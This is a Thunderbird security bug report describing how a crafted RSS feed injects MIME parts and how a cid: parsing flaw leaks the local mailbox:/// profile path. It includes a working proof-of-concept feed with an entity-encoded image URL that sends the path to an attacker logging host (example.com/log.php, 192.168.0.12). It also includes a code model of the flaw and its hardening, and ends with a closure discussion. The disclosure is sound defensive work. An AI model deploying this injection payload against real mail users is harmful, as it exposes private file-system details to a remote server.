Closed Bug 1411713 Opened 7 years ago Closed 6 years ago

TBE-01-013: RSS Local Path Leak via cid: Parsing Bug

Categories

(MailNews Core :: MIME, defect)

Type: defect
Priority: Not set
Severity: critical

Tracking

(Not tracked)

RESOLVED WORKSFORME

People

(Reporter: BenB, Unassigned)

Details

(Keywords: csectype-disclosure, privacy, sec-moderate, Whiteboard: [attack vectors closed?])

As described in TBE-01-011, it is possible to influence the created email structure of an RSS feed item. This allows embedding attachments and referencing them via the cid: protocol [4]. This protocol handler can reference an attachment via its defined Content-ID header. Since the RSS feed operates on the local file-system environment, Thunderbird converts a specified cid: handler to the mailbox:/// protocol. This would normally not be a problem as JavaScript is not executed and therefore it is not possible to extract the mailbox:/// URL. However, it was discovered that Thunderbird suffers from the following parsing bug, which allows leaking the mailbox:// URL to an attacker-controlled server.

[3] https://www.fxsitecompat.com/en-CA/docs/2015/moz-document-support-has-been-dropped/
[4] https://tools.ietf.org/html/rfc2392

Email Body:

    <img src="&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x65;&#x78;&#x61;&#x6D;&#x70;&#x6C;&#x65;&#x2E;&#x63;&#x6F;&#x6D;&#x2F;&#x6C;&#x6F;&#x67;&#x2E;&#x70;&#x68;&#x70;&#x3F;&#x0A;&#x0A;cid:aaaaab">

Decoded HTML Entity Payload:

    http://example.com/log.php?

    cid:aaaaab

Parsed by Thunderbird:

    <img src="http://example.com/log.php?
    mailbox:///C:/Users/UserNAme/AppData/Roaming/Thunderbird/Profiles/anrhqp9r.pgp/Mail/Feeds/Feed1?number=1&part=1.1.3&filename=test.html">

Thunderbird will then try to fetch the specified image from the attacker's web server. In doing so, it will leak the local file path to the RSS feed. The following RSS feed contains an example of this behavior. It will reference the injected file attachment, which is then leaked to the attacker's web server.
PoC:

    <?xml version="1.0" encoding="UTF-8"?>
    <rss xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
      <channel>
        <title>Feed1</title>
        <link>aaa</link>
        <item>
          <title>Feed1</title>
          <guid isPermaLink="false">myguid&gt;&#x0a;Content-Type: multipart/alternative; boundary="------------2DEE3F98D70BD2C65FBA7373"&#x0a;MIME-Version: 1.0&#x0a;Subject: feed1&#x0a;From: test@example.com&#x0a;To: test@example.com&#x0a;&#x0a;This is a multi-part message in MIME format.&#x0a;--------------2DEE3F98D70BD2C65FBA7373&#x0a;Content-Type: multipart/related; boundary="------------A320A96F6639F3C578F35383"&#x0a;&#x0a;&#x0a;--------------A320A96F6639F3C578F35383&#x0a;Content-ID: myself&#x0a;Content-Type: text/html&#x0a;Content-Transfer-Encoding: 7Bit&#x0a;&#x0a;&lt;img src="&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x31;&#x39;&#x32;&#x2E;&#x31;&#x36;&#x38;&#x2E;&#x30;&#x2E;&#x31;&#x32;&#x2F;&#x6C;&#x6F;&#x67;&#x2E;&#x70;&#x68;&#x70;&#x3F;&#x0A;&#x0A;cid:aaaaab"&gt;&#x0a;--------------A320A96F6639F3C578F35383&#x0a;Content-ID: aaaaab&#x0a;Content-Type: image/svg+xml&#x0a;Content-Transfer-Encoding: 7bit&#x0a;Content-Disposition: attachment; filename="test.svg"&#x0a;&#x0a;a&#x0a;&#x0a;--------------A320A96F6639F3C578F35383--&#x0a;&#x0a;--------------2DEE3F98D70BD2C65FBA7373--&#x0a;&#x0a;&#x0a;&#x0a;&#x0a;</guid>
        </item>
      </channel>
    </rss>

Email Body (message as stored by Thunderbird):

    From - Thu, 28 Sep 2017 14:18:48 +0200
    X-Mozilla-Status: 0041
    X-Mozilla-Status2: 00000000
    X-Mozilla-Keys:
    Received: by localhost; Thu, 28 Sep 2017 14:18:48 +0200
    Date: Thu, 28 Sep 2017 14:18:48 +0200
    Message-Id: <myguid>
    Content-Type: multipart/alternative; boundary="------------2DEE3F98D70BD2C65FBA7373"
    MIME-Version: 1.0
    Subject: feed1
    From: test@example.com
    To: test@example.com

    This is a multi-part message in MIME format.
    --------------2DEE3F98D70BD2C65FBA7373
    Content-Type: multipart/related; boundary="------------A320A96F6639F3C578F35383"


    --------------A320A96F6639F3C578F35383
    Content-ID: myself
    Content-Type: text/html
    Content-Transfer-Encoding: 7Bit

    <img src="http://192.168.0.12/log.php?

    cid:aaaaab">
    --------------A320A96F6639F3C578F35383
    Content-ID: aaaaab
    Content-Type: image/svg+xml
    Content-Transfer-Encoding: 7bit
    Content-Disposition: attachment; filename="test.svg"

    a

    --------------A320A96F6639F3C578F35383--

    --------------2DEE3F98D70BD2C65FBA7373--




    @localhost.localdomain>
    From: Feed1
    MIME-Version: 1.0
    Subject: Feed1
    Content-Transfer-Encoding: 8bit
    Content-Base:
    Content-Type: text/html; charset=UTF-8

    <html>
      <head>
        <title>Feed1</title>
        <base href="">
      </head>
      <body id="msgFeedSummaryBody" selected="false">
        Feed1
      </body>
    </html>

It is recommended to check the parsing code of the cid: protocol and investigate why it does not detect a prepended encoded HTTP URL.
Group: mail-core-security
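As an added illustration, and not Thunderbird or libmime code nor the fix that landed (the thread only records that bug 1411699 closed the injection vector), the following Node.js model shows why the entity-encoded payload in the report works and what a stricter cid: rewriter would do instead. The entity decoder, the Content-ID to part-number map, the mailbox:/// base URL, the part numbers and the attacker host are all constructed assumptions; the "naive" rewriter is a model of the reported behaviour (any `cid:` substring in the attribute value is resolved and the local URL is spliced in), and the "strict" one only honours a `cid:` that is the whole attribute value after whitespace trimming, which is how a browser reads a URL attribute.

```javascript
// Added example (not Thunderbird/libmime code): a model of cid: rewriting in a
// rendered HTML body, reproducing the TBE-01-013 leak and a hardened variant.
// All names, URLs and part numbers below are constructed for illustration.

// Decode numeric character references (&#xNN; / &#NN;) the way an HTML parser
// does when it reads an attribute value. Named entities are out of scope.
function decodeNumericEntities(s) {
  return s.replace(/&#x([0-9a-fA-F]+);|&#([0-9]+);/g, (m, hex, dec) =>
    String.fromCodePoint(hex ? parseInt(hex, 16) : parseInt(dec, 10)));
}

// Assumed Content-ID -> MIME part map for the injected multipart/related body.
const CONTENT_ID_PARTS = { myself: "1.1.1", aaaaab: "1.1.2" };

// Assumed local message URL; a real one is profile- and user-specific.
const MAILBOX_BASE =
  "mailbox:///C:/Users/UserName/AppData/Roaming/Thunderbird/Profiles/example/Mail/Feeds/Feed1?number=1";

function partUrl(contentId) {
  const part = CONTENT_ID_PARTS[contentId];
  return part === undefined ? null : `${MAILBOX_BASE}&part=${part}`;
}

// Model of the reported bug: "cid:" is looked for anywhere in the value, so a
// value that starts with a remote URL still gets the mailbox:/// URL appended.
function rewriteSrcNaive(src) {
  const i = src.indexOf("cid:");
  if (i === -1) return src;
  const resolved = partUrl(src.slice(i + 4));
  return resolved === null ? src : src.slice(0, i) + resolved;
}

// Hardened model: cid: must be the entire value (ignoring leading/trailing
// whitespace, which browsers strip from URL attributes). Any other scheme is
// left untouched, so local data is never spliced into a remote URL.
function rewriteSrcStrict(src) {
  const m = /^\s*cid:(\S+)\s*$/.exec(src);
  if (!m) return src;
  const resolved = partUrl(m[1]);
  return resolved === null ? src : resolved;
}

// Return the resolved src of every <img> in a body, decoded as a renderer
// would decode the attribute before handing it to the URL rewriter.
function resolveImgSrcs(html, rewrite) {
  const out = [];
  const re = /<img\s[^>]*?src="([^"]*)"/gi;
  let m;
  while ((m = re.exec(html)) !== null) out.push(rewrite(decodeNumericEntities(m[1])));
  return out;
}

// Constructed body: the report's payload, entity-encoded exactly as an
// attacker would ship it, which decodes to "http://example.com/log.php?\n\ncid:aaaaab".
const PAYLOAD = [..."http://example.com/log.php?\n\ncid:aaaaab"]
  .map(c => "&#x" + c.codePointAt(0).toString(16).toUpperCase() + ";").join("");
const BODY = `<img src="${PAYLOAD}"><img src="cid:aaaaab">`;

// A resolved src leaks when its effective target is remote but it carries
// local mailbox:/// data (here: the profile path and feed part).
function leaksLocalUrl(src) {
  return /^\s*https?:/i.test(src) && src.includes("mailbox:///");
}

function demo() {
  return {
    naive: resolveImgSrcs(BODY, rewriteSrcNaive),
    strict: resolveImgSrcs(BODY, rewriteSrcStrict),
  };
}

if (typeof require !== "undefined" && require.main === module) {
  const { naive, strict } = demo();
  console.log("naive :", naive, naive.map(leaksLocalUrl));
  console.log("strict:", strict, strict.map(leaksLocalUrl));
}
```

Running it shows the naive rewriter turning the first `<img>` into `http://example.com/log.php?` followed by the full mailbox:/// URL, which is what the web server at the attacker's host would receive in the request path, while the strict rewriter leaves that value alone and still resolves the legitimate `cid:aaaaab` reference. The same whitespace-and-scheme check applies to `href`, `background` and CSS `url()` values, since libmime rewrites cid: in more than just `<img src>`.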
For the original report as PDF; see bug 1411701.
Bug 1411699 will close the vector for injection of such a crafted eml via feed parsing. However, there are likely numerous ways to hand craft mime structures to break/leak in libmime. This bug belongs to that component imo.
Component: Feed Reader → MIME
Summary: RSS Local Path Leak via cid: Parsing Bug → TBE-01-013: RSS Local Path Leak via cid: Parsing Bug
Whiteboard: [attack vectors closed?]

alta88, I'm wondering if there is anything specific left to do in this bug, or if it would be better to open new issues for any further attack vectors?

Flags: needinfo?(alta88)

I created a feed file with the PoC part above, adjusting for the wrapping there (it fails as invalid xml), adjusting for missing tags (that the parser fails it on), and a message was stored with a long messageId but no other content. So yes, a new vector needs to be found to exploit the cid, post Bug 1411699.

It would be good to ask cure53 to recheck on the 68 esr version.

Flags: needinfo?(alta88)
Status: NEW → RESOLVED
Closed: 6 years ago
Resolution: --- → WORKSFORME
Group: mail-core-security